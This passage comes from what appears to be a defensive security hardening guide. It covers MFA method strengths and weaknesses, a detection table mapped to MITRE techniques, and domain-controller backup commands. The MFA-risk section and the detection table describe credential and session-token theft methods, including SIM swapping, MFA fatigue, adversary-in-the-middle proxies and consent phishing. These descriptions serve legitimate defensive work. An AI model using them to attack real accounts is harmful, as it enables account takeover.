width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Cloud Provider</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Attack Surface Discovery Capability</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Google Cloud</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://cloud.google.com/security/products/security-command-center"><span style="text-decoration: underline; vertical-align: baseline;">Security Command Center</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon Web Services</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AWS Config / Inspector</span></a></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Microsoft Azure</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://learn.microsoft.com/en-us/azure/external-attack-surface-management/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Defender External Attack Surface Management (Defender EASM</span></a><span style="vertical-align: baseline;">)</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 2: Overview of cloud provider attack surface discovery capabilities</span></span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Enforce Multi-Factor Authentication</span></h4> <p><span style="vertical-align: baseline;">External-facing assets that leverage single-factor authentication (SFA) are highly susceptible to brute-forcing attacks, password spraying, or unauthorized remote access using valid (stolen) credentials. External-facing applications and services that currently allow for SFA should be configured to support multi-factor authentication (MFA). Additionally, MFA should be leveraged for accessing not only on-premises external-facing managed infrastructure, but also for cloud-based resources (e.g., software-as-a-service [SaaS] such as Microsoft 365 [M365]). </span></p> <p><span style="vertical-align: baseline;">When configuring multifactor authentication, the following methods are commonly considered (and ranked from most to least secure):</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Fast IDentity Online 2 (FIDO2)/WebAuthn security keys or passkeys</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Software/hardware Open Authentication (OAUTH) token</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Authenticator application (e.g., Duo/Microsoft [MS] Authenticator/Okta Verify)</span></p> </li> <li aria-level="2" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Time-based One Time Password (TOTP)</span></p> </li> <li aria-level="2" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Push notification (least preferred option) using number matching when possible</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Phone call</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Short Message Service (SMS) verification</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Email-based verification</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Risks of Specific MFA Methods</span></h4> <h5><span style="vertical-align: baseline;">Push Notifications</span></h5> <p><span style="vertical-align: baseline;">If an organization is leveraging push notifications for MFA (e.g., a notification that requires acceptance via an application or automated call to a mobile device), threat actors can exploit this type of MFA configuration for attempted access, as a user may inadvertently accept a push notification on their device without the context of where the authentication was initiated. </span></p> <h5><span style="vertical-align: baseline;">Phone/SMS Verification</span></h5> <p><span style="vertical-align: baseline;">If an organization is leveraging phone calls or SMS-based verification for MFA, these methods are not encrypted and are susceptible to potentially being intercepted by a threat actor. These methods are also vulnerable if a threat actor is able to transfer an employee's phone number to an attacker-controlled subscriber identification module (SIM) card. This would result in the MFA notifications being routed to the threat actor instead of the intended employee. </span></p> <h5><span style="vertical-align: baseline;">Email-Based Verification</span></h5> <p><span style="vertical-align: baseline;">If an organization is leveraging email-based verification for validating access or for retrieving MFA codes, and a threat actor has already established the ability to access the email of their target, the actor could potentially also retrieve the email(s) to validate and complete the MFA process. </span></p> <p><span style="vertical-align: baseline;">If any of these MFA methods are leveraged, consider:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Training remote users to never accept or respond to a logon notification when they are not actively attempting to log in.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Establishing a method for users to report suspicious MFA notifications, as this could be indicative of a compromised account.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ensuring there are messaging policies in place to prevent the auto-forwarding of email messages outside the organization.</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">Time-Based One-Time Password</span></h5> <p><span style="vertical-align: baseline;">Time-based one-time password (TOTP) relies on a shared secret, called a seed, known by both the authenticating system and the authenticator possessed by an end user. If a seed is compromised, the TOTP authenticator can be duplicated and used by a threat actor.</span></p> <h4><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Detection Opportunities for External-Facing Assets and MFA Attempts</span></span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Brute Force</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1110/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1110 – Brute Force</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for a single user with an excessive number of failed logins from external Internet Protocol (IP) addresses. </span></p> <p><span style="vertical-align: baseline;">This risk can be mitigated by enforcing a strong password, MFA, and lockout policy.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Password Spray</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1110/003/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1110.003 – Password Spray</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for a high number of accounts with failed logins, typically from the similar origination addresses.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Multiple Failed MFA Same User</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1110/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1110 – Brute Force</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for multiple failed MFA conditions for the same account. This may be indicative of a previously compromised credential.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Multiple Failed MFA Same Source</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1110/003/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1110.003 – Password Spray</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for multiple failed MFA prompts for different users from the same source. This may be indicative of multiple compromised credentials and an attempt to "spray" MFA prompts/tokens for access.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">External Authentication from an Account with Elevated Privileges</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Privileged accounts should use internally managed and secured privileged access workstations for access and should not be accessible directly from an external (untrusted) source.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Adversary in the Middle (AiTM) Session Token Theft</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1557/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1557 - Adversary in the Middle</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for sign-ins where the authentication method succeeds but the session originates from an IP/ASN inconsistent with the user's prior sessions. </span></p> <p><span style="vertical-align: baseline;">Detect logins from newly registered domains or known reverse-proxy infrastructure (EvilProxy, Tycoon 2FA). </span></p> <p><span style="vertical-align: baseline;">Correlate sign-in logs for "isInteractive: true" sessions with anomalous user-agent strings or geographically impossible travel.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MFA Fatigue / Prompt Bombing</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1621/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1621 - MFA Request Generation</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for accounts receiving more than five MFA push notifications within a 10-minute window without a corresponding successful authentication. </span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-Authentication MFA Device Registration</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1098/005/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1098.005 - Account Manipulation - Device Registration</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor audit logs for new MFA device registrations (AuthenticationMethodRegistered) occurring within 60 minutes of a sign-in from a new IP or device. Attackers who steal session tokens via AiTM immediately register their own MFA device for persistent access.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">OAuth/Consent Phishing</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1550/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1550.001 - Use Alternate Authentication Material</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for OAuth application consent grants with high-privilege scopes (Mail.Read, Files.ReadWrite.All) from unrecognized application IDs.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 3: Detection opportunities for external-facing assets and MFA attempts</span></p> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">2. Critical Asset Protections</span></h3> <h4><span style="vertical-align: baseline;">Domain Controller and Critical Asset Backups</span></h4> <p><span style="vertical-align: baseline;">Organizations should verify that backups for domain controllers and critical assets are available and protected against unauthorized access or modification. Backup processes and procedures should be exercised on a continual basis. Backups should be protected and stored within secured enclaves that include both network and identity segmentation. </span></p> <p><span style="vertical-align: baseline;">If an organization's Active Directory (AD) were to become corrupted or unavailable due to ransomware or a potentially destructive attack, restoring Active Directory from domain controller backups may be the only viable option to reconstitute domain services. The following domain controller recovery and reconstitution best practices should be proactively reviewed by organizations: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Verify that there is a known good backup of domain controllers and </span><code style="vertical-align: baseline;">SYSVOL</code><span style="vertical-align: baseline;"> shares (e.g., from a domain controller – backup </span><code style="vertical-align: baseline;">C:\Windows\SYSVOL</code><span style="vertical-align: baseline;">).</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">For domain controllers, a system state backup is preferred.</span> <br/><br/></span><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">For a system state backup to occur, </span><span style="font-style: italic; vertical-align: baseline;">Windows Server Backup</span><span style="vertical-align: baseline;"> must be installed as a feature on a domain controller. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation">The following command can be run from an elevated command prompt to initiate a system state backup of a domain controller.</p> </li> </ul> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>wbadmin start systemstatebackup -backuptarget:&lt;targetDrive&gt;:</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 1: Command to perform a system state backup</span></p></div> <div class="block-paragraph_advanced"><ul> <li style="list-style-type: none;"> <ul> <li><span style="vertical-align: baseline;">The following command can be run from an elevated command prompt to perform a </span><code style="vertical-align: baseline;">SYSVOL</code><span style="vertical-align: baseline;"> backup. (</span><span style="font-style: italic; vertical-align: baseline;">Manage auditing and security log</span><span style="vertical-align: baseline;"> permissions must also be configured for the account performing the backup.)</span></li> </ul> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>robocopy c:\windows\sysvol c:\sysvol-backup /copyall /mir /b /r:0 /xd</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 2: Command to perform a SYSVOL backup</span></p></div> <div class="block-paragraph_advanced"><ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Proactively identify domain controllers that hold flexible single master operation (FSMO) roles, as these domain controllers will need to be prioritized for recovery in the event that a full domain restoration is required. </span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>netdom query fsmo</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 3: Command to identify domain controllers that hold FSMO roles</span></p></div> <div class="block-paragraph_advanced"><ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Offline backups: Ensure offline domain controller backups are secured and stored separately from online backups. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Encryption: Backup data should be encrypted both during transit (over the wire) and when at rest or mirrored for offsite storage. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">DSRM Password validation: Ensure that the Directory Services Restore Mode (DSRM) password is set to a known value for each domain controller. This password is required when performing an authoritative or nonauthoritative domain controller restoration. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Configure alerting for backup operations: Backup products and technologies should be configured to detect and provide alerting for operations critical to the availability and integrity of backup data (e.g., deletion of backup data, purging of backup metadata, restoration events, media errors). </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce role-based access control (RBAC): Access to backup media and the applications that govern and manage data backups should use RBAC to restrict the scope of accounts that have access to the stored data and configuration parameters. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Testing and verification: Both authoritative and nonauthoritative domain controller restoration processes should be documented and tested on a regular basis. The same testing and verification processes should be enforced for critical assets and data.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Business Continuity Planning</span></h4> <p><span 